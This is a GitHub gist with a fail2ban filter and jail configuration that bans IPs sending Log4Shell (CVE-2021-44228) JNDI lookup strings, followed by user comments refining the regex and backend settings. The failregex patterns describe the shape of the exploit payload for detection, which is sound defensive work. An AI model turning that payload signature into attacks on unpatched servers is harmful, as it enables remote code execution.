Last active
February 2, 2022 12:04
-
-
Save jaygooby/3502143639e09bb694e9c0f3c6203949 to your computer and use it in GitHub Desktop.
fail2ban filter rule for the log4j CVE-2021-44228 exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# log4j jndi exploit CVE-2021-44228 filter | |
# Save this file as /etc/fail2ban/filter.d/log4j-jndi.conf | |
# then copy and uncomment the [log4j-jndi] section | |
# to /etc/fail2ban/jail.local | |
# | |
# jay@gooby.org | |
# https://jay.gooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228 | |
# https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949 | |
# Thanks to https://gist.github.com/kocour for a better regex | |
# | |
# Bad actors trying to exploit log4j - instaban them with | |
# this in your /etc/fail2ban/jail.local | |
# | |
# We're using maxretry = 1 | |
# because we know that they're a bad actor... | |
# | |
# [log4j-jndi] | |
# maxretry = 1 | |
# enabled = true | |
# port = 80,443 | |
# logpath = /path/to/your/*access.log | |
[Definition] | |
failregex = (?i)^<HOST> .* ".*\$.*(7B|\{).*(lower:)?.*j.*n.*d.*i.*:.*".*?$ |
I debugged my jail.local and the problem is log4j
Just collating in a single comment the changes I chose/had to make to get this working for me, mostly from the comments above.
# log4j jndi exploit CVE-2021-44228 filter
# Save this file as /etc/fail2ban/filter.d/log4j-jndi.conf
# then copy and uncomment the [log4j-jndi] section
# to /etc/fail2ban/jail.local
#
# jay@gooby.org
# https://jay.gooby.org/2021/12/13/a-fail2ban-filter-for-the-log4j-cve-2021-44228
# https://gist.github.com/jaygooby/3502143639e09bb694e9c0f3c6203949
# Thanks to https://gist.github.com/kocour for a better regex
#
# Bad actors trying to exploit log4j - instaban them with
# this in your /etc/fail2ban/jail.local
#
# We're using maxretry = 1
# because we know that they're a bad actor...
#
# [log4j-jndi]
# maxretry = 1
# filter = log4j-jndi
# action = your_actions_here
# enabled = true
# port = 80,443
# logpath = /path/to/your/*access.log
[Definition]
failregex = (?i)^<HOST> .* ".*(\$|%%24).*(\{|%%7B).*(lower:)?.*j.*n.*d.*i.*(:|%%3A).*".*?$
ignoreregex =
I chose to use the regex suggested by @ursut. Thanks for sharing this @jaygooby!
I found the problem there is no backend your jail says it doesn't find the logs so I point to the logs but need to put a backend
[log4j-jndi]
maxretry = 1
enabled = true
filter = log4j-jndi
port = 80,443
logpath = /var/log/httpd/*access.log
backend = %(syslog_backend)s
# Ban IP and report to AbuseIPDB for LOG4J
action = %(action_)s
%(action_abuseipdb)s[abuseipdb_category="3,4,6,15,18,20,22"]
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Do we need to extend the regex pattern for the next CVE? CVE-2021-45105
https://thehackernews.com/2021/12/apache-issues-3rd-patch-to-fix-new-high.html
Any ideas?